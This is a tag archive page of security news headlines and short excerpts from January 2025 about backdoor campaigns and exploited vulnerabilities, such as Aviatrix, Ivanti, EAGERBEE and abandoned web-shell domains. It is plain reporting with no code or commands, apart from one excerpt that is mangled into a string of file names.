Tag: backdoor

How organizations can secure their AI code

Jan 20, 2025 8:22 AM

Tags: ai, application-security, awareness, backdoor, breach, business, chatgpt, ciso, compliance, control, credentials, crime, cybersecurity, data, data-breach, finance, github, healthcare, LLM, malicious, ml, open-source, organized, programming, risk, risk-management, software, startup, strategy, supply-chain, technology, tool, training, vulnerability

In 2023, the team at data extraction startup Reworkd was under tight deadlines. Investors pressured them to monetize the platform, and they needed to migrate everything from Next.js to Python/FastAPI. To speed things up, the team decided to turn to ChatGPT to do some of the work. The AI-generated code appeared to function, so they…
US hits back against China’s Salt Typhoon group

Jan 18, 2025 5:22 AM

Tags: attack, backdoor, china, cisa, ciso, communications, computer, control, crypto, cve, cyber, cyberattack, cybersecurity, defense, detection, disinformation, espionage, exploit, finance, government, group, infosec, infrastructure, intelligence, ivanti, law, malicious, mandiant, microsoft, network, north-korea, office, tactics, technology, theft, threat, tool, vpn, vulnerability

The US is hitting back against the threat group, dubbed Salt Typhoon by Microsoft, which is allegedly behind recent cyber attacks against American telecommunications providers, as part of a wider campaign against Chinese-based hacking.On Friday the Department of the Treasury’s Office of Foreign Assets Control (OFAC) said it is sanctioning Sichuan Juxinhe Network Technology, a…
Hackers Use CVE-2024-50603 to Deploy Backdoor on Aviatrix Controllers

Jan 15, 2025 11:02 AM

Tags: backdoor, cve, exploit, hacker, vulnerability

A critical vulnerability (CVE-2024-50603) in the Aviatrix Controller allows unauthenticated RCE. Active exploitation observed by Wiz Research in… First seen on hackread.com Jump to article: hackread.com/hackers-cve-2024-50603-aviatrix-controllers-backdoor/
Cryptojacking, backdoors abound as fiends abuse Aviatrix Controller bug

Jan 14, 2025 8:46 AM

Tags: backdoor

This is what happens when you publish PoCs immediately, hm? First seen on theregister.com Jump to article: www.theregister.com/2025/01/13/severe_aviatrix_controller_vulnerability/
Hackers exploit critical Aviatrix Controller RCE flaw in attacks

Jan 14, 2025 8:46 AM

Tags: attack, backdoor, crypto, cve, exploit, flaw, hacker, rce, remote-code-execution, threat, vulnerability

Threat actors are exploiting a critical remote command execution vulnerability, tracked as CVE-2024-50603, in Aviatrix Controller instances to install backdoors and crypto miners. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/hackers-exploit-critical-aviatrix-controller-rce-flaw-in-attacks/
Hackers Exploit Aviatrix Controller Vulnerability to Deploy Backdoors and Crypto Miners

Jan 14, 2025 8:46 AM

Tags: backdoor, cloud, crypto, cve, exploit, flaw, hacker, vulnerability

A recently disclosed critical security flaw impacting the Aviatrix Controller cloud networking platform has come under active exploitation in the wild to deploy backdoors and cryptocurrency miners.Cloud security firm Wiz said it’s currently responding to “multiple incidents” involving the weaponization of CVE-2024-50603 (CVSS score: 10.0), a maximum severity bug that could result in First seen…
Nominet probes network intrusion linked to Ivanti zero-day exploit

Jan 13, 2025 12:26 PM

Tags: backdoor, exploit, ivanti, network, unauthorized, zero-day

Unauthorized activity detected, but no backdoors found First seen on theregister.com Jump to article: www.theregister.com/2025/01/13/nominet_ivanti_zero_day/
Expired Domains Allowed Control Over 4,000 Backdoors on Compromised Systems

Jan 13, 2025 8:26 AM

Tags: backdoor, control, infrastructure, threat

No less than 4,000 unique web backdoors previously deployed by various threat actors have been hijacked by taking control of abandoned and expired infrastructure for as little as $20 per domain.Cybersecurity company watchTowr Labs said it pulled off the operation by registering over 40 domain names that the backdoors had been designed to use for…
RedDelta Leverages PlugX Backdoor in State-Sponsored Espionage Campaigns

Jan 13, 2025 5:28 AM

Tags: backdoor, cyber, espionage, group, threat

A recent report by Insikt Group reveals an ongoing, sophisticated cyber-espionage operation by the RedDelta advanced persistent threat First seen on securityonline.info Jump to article: securityonline.info/reddelta-leverages-plugx-backdoor-in-state-sponsored-espionage-campaigns/
2025 Cybersecurity and AI Predictions

Jan 11, 2025 11:42 AM

Tags: access, ai, api, attack, backdoor, backup, browser, business, chrome, communications, compliance, control, corporate, crowdstrike, crypto, cybercrime, cybersecurity, dark-web, data, deep-fake, defense, detection, exploit, finance, firmware, flaw, framework, fraud, GDPR, hacker, Hardware, identity, intelligence, international, korea, LLM, malicious, mitigation, monitoring, network, open-source, privacy, regulation, resilience, risk, risk-assessment, scam, service, skills, supply-chain, switch, technology, threat, tool, training, unauthorized, vulnerability

The cybersecurity and AI landscape continues to evolve at a breathtaking pace, and with it, the associated risks. Snowballing cybercrime costs are compounded by a cybersecurity workforce gap of nearly 4.8 million professionals, as reported by ISC2. Meanwhile, ISACA’s end-2024 State of Cybersecurity Report shows that nearly half of those surveyed claim no involvement in…
QSC: Multi-Plugin Malware Framework Installs Backdoor on Windows

Jan 10, 2025 1:18 PM

Tags: backdoor, cyber, framework, malware, service, windows

The QSC Loader service DLL named >>loader.dll>drivers\msnet>n_600s.sys
RedDelta Deploys PlugX Malware to Target Mongolia and Taiwan in Espionage Campaigns

Jan 10, 2025 12:18 PM

Tags: backdoor, china, espionage, group, malware, threat

Mongolia, Taiwan, Myanmar, Vietnam, and Cambodia have been targeted by the China-nexus RedDelta threat actor to deliver a customized version of the PlugX backdoor between July 2023 and December 2024.”The group used lure documents themed around the 2024 Taiwanese presidential candidate Terry Gou, the Vietnamese National Holiday, flood protection in Mongolia, and meeting invitations, including…
Ivanti zero-day exploited by APT group that previously targeted Connect Secure appliances

Jan 10, 2025 5:18 AM

Tags: access, advisory, api, apt, attack, authentication, backdoor, china, credentials, cve, cyberespionage, data, espionage, exploit, flaw, google, group, ivanti, malicious, malware, mandiant, network, remote-code-execution, service, software, threat, tool, vpn, vulnerability, zero-day

Researchers from Google’s Mandiant division believe the critical remote code execution vulnerability patched on Wednesday by software vendor Ivanti has been exploited since mid-December by a Chinese cyberespionage group. This is the same group that has exploited zero-day vulnerabilities in Ivanti Connect Secure appliances back in January 2024 and throughout the year.The latest attacks, exploiting…
Legitimate PoC exploited to spread information stealer

Jan 10, 2025 5:18 AM

Tags: access, awareness, backdoor, ceo, computer, cve, exploit, github, hacker, identity, infosec, Internet, linux, malicious, malware, open-source, RedTeam, social-engineering, software, tactics, threat, tool, training, vulnerability, windows

A recently copied and abused open source proof of concept (PoC) exploit from a reputable security company, aimed at helping threat researchers, is the latest example of the novel tactics hackers will use to spread malware.PoCs for known vulnerabilities are created to be shared by students, researchers, and IT pros to improve software and toughen…
Thousands of deserted backdoors disrupted

Jan 9, 2025 10:21 PM

Tags: backdoor

First seen on scworld.com Jump to article: www.scworld.com/brief/thousands-of-deserted-backdoors-disrupted
Thousands of Live Hacker Backdoors Found in Expired Domains

Jan 9, 2025 2:20 PM

Tags: backdoor, cybersecurity, exploit, hacker, infrastructure

SUMMARY Cybersecurity researchers at watchTowr have identified over 4,000 live hacker backdoors, exploiting abandoned infrastructure and expired domains…. First seen on hackread.com Jump to article: hackread.com/live-hacker-backdoors-found-in-expired-domains/
Malicious hackers have their own shadow IT problem

Jan 8, 2025 10:19 PM

Tags: backdoor, group, hacker, hacking, infrastructure, Internet, malicious

Researchers at watchTowr Labs found that abandoned and expired internet infrastructure left by hacking groups can function as backdoors within other backdoors. First seen on cyberscoop.com Jump to article: cyberscoop.com/malicious-hackers-have-their-own-shadow-it-problem/
Abandoned Backdoors: How Malicious Infrastructure Lives On

Jan 8, 2025 7:18 PM

Tags: access, backdoor, government, infrastructure, malicious, phone

Studying Backdoors in Web Shells, Researchers Find 4,000 Infected Systems How many servers are infected by web shells designed to give attackers remote access to systems, but now phone home to malicious infrastructure that’s now abandoned or expired? Security researchers who posed that question have counted 4,000 such systems, including in government and education. First…
Over 4,000 backdoors hijacked by registering expired domains

Jan 8, 2025 7:18 PM

Tags: backdoor, infrastructure

Over 4,000 abandoned but still active web backdoors were hijacked and their communication infrastructure sinkholed after researchers registered expired domains used for commanding them. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/over-4-000-backdoors-hijacked-by-registering-expired-domains/
Crims backdoored the backdoors they supplied to other miscreants. Then the domains lapsed

Jan 8, 2025 12:18 PM

Tags: backdoor

Here’s what $20 gets you these days First seen on theregister.com Jump to article: www.theregister.com/2025/01/08/backdoored_backdoors/
Middle East subjected to Eagerbee backdoor attacks

Jan 7, 2025 10:18 PM

Tags: attack, backdoor, middle-east

First seen on scworld.com Jump to article: www.scworld.com/brief/middle-east-subjected-to-eagerbee-backdoor-attacks
Agents, Robotics, and Auth Oh My! – Impart Security

Jan 7, 2025 5:18 PM

Tags: access, ai, api, attack, automation, awareness, backdoor, breach, chatgpt, cloud, conference, control, credentials, cyber, cyberattack, cybersecurity, data, data-breach, ddos, deep-fake, defense, detection, email, exploit, finance, firewall, fraud, healthcare, incident response, infrastructure, intelligence, kubernetes, LLM, malicious, malware, mitigation, network, offense, password, phishing, risk, saas, scam, security-incident, service, social-engineering, software, strategy, supply-chain, technology, threat, unauthorized, update, vulnerability, waf

Agents, Robotics, and Auth – Oh My! Introduction 2025 will be the year of the futurist. I never thought that I’d be writing a blog post about AI and robotics at this point in my career, but technology has advanced so much in the lat 12 months setting up 2025 to be a landmark year…
EAGERBEE Malware Updated It’s Arsenal With Payloads Command Shells

Jan 7, 2025 4:19 PM

Tags: attack, backdoor, cyber, government, kaspersky, malware, service

The Kaspersky researchers investigation into the EAGERBEE backdoor revealed its deployment within Middle Eastern ISPs and government entities of novel components, including a service injector that injects the backdoor into running services. Post-installation, EAGERBEE deploys plugins with diverse functionalities as follows: How Does Attack Work? The attackers initially compromised the system through an unknown vector.…
New EAGERBEE Variant Targets ISPs and Governments with Advanced Backdoor Capabilities

Jan 7, 2025 11:17 AM

Tags: backdoor, government, Internet, malware, middle-east, service

Internet service providers (ISPs) and governmental entities in the Middle East have been targeted using an updated variant of the EAGERBEE malware framework.The new variant of EAGERBEE (aka Thumtais) comes fitted with various components that allow the backdoor to deploy additional payloads, enumerate file systems, and execute commands shells, demonstrating a significant evolution.”The key First…
Eagerbee backdoor targets govt entities and ISPs in the Middle East

Jan 7, 2025 8:17 AM

Tags: attack, backdoor, government, Internet, kaspersky, middle-east, service

Experts spotted new variants of the Eagerbee backdoor being used in attacks on government organizations and ISPs in the Middle East. Kaspersky researchers reported that new variants of the Eagerbee backdoor being used in attacks against Internet Service Providers (ISPs) and government entities in the Middle East. The Kaspersky’s analysis revealed new attack components, including…
EAGERBEE: Advanced Backdoor Targets Middle Eastern ISPs and Government Entities

Jan 7, 2025 5:17 AM

Tags: backdoor, cyberespionage, government, Internet, kaspersky, service

Kaspersky Labs has uncovered a sophisticated cyberespionage campaign deploying the EAGERBEE backdoor to infiltrate internet service providers (ISPs) First seen on securityonline.info Jump to article: securityonline.info/eagerbee-advanced-backdoor-targets-middle-eastern-isps-and-government-entities/
EagerBee Backdoor Takes Flight Against Mideast ISPs, Government Targets

Jan 6, 2025 11:17 PM

Tags: backdoor, china, government, infection, malware

The malware, operated by China-backed cyberattackers, has been significantly fortified with new evasive and post-infection capabilities. First seen on darkreading.com Jump to article: www.darkreading.com/cyberattacks-data-breaches/eagerbee-backdoor-middle-east-isps-government-targets
Eagerbee backdoor deployed against Middle Eastern govt orgs, ISPs

Jan 6, 2025 4:17 PM

Tags: backdoor, framework, government, Internet, malware, service

New variants of the Eagerbee malware framework are being deployed against government organizations and internet service providers (ISPs) in the Middle East. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/eagerbee-backdoor-deployed-against-middle-eastern-govt-orgs-isps/
Stealthy Steganography Backdoor Attacks Target Android Apps

Jan 6, 2025 10:19 AM

Tags: android, attack, backdoor, cyber, mobile

BARWM, a novel backdoor attack approach for real-world deep learning (DL) models deployed on mobile devices. Existing backdoor attacks often suffer from limitations such as altering the model structure or relying on easily detectable, sample-agnostic triggers. By utilizing DNN-based steganography to generate sample-specific backdoor triggers that are imperceptible, it is able to circumvent these limitations.…
PLAYFULGHOST backdoor supports multiple information stealing features

Jan 6, 2025 5:17 AM

Tags: access, backdoor, google, malware

PLAYFULGHOST is a new malware family with capabilities including keylogging, screen and audio capture, remote shell access, and file transfer/execution. Google researchers analyzed a new malware family called PLAYFULGHOST that supports multiple features, including keylogging, screen and audio capture, remote shell, and file transfer/execution. The PLAYFULGHOST backdoor shares functionality with Gh0st RAT whose source code was publicly released in…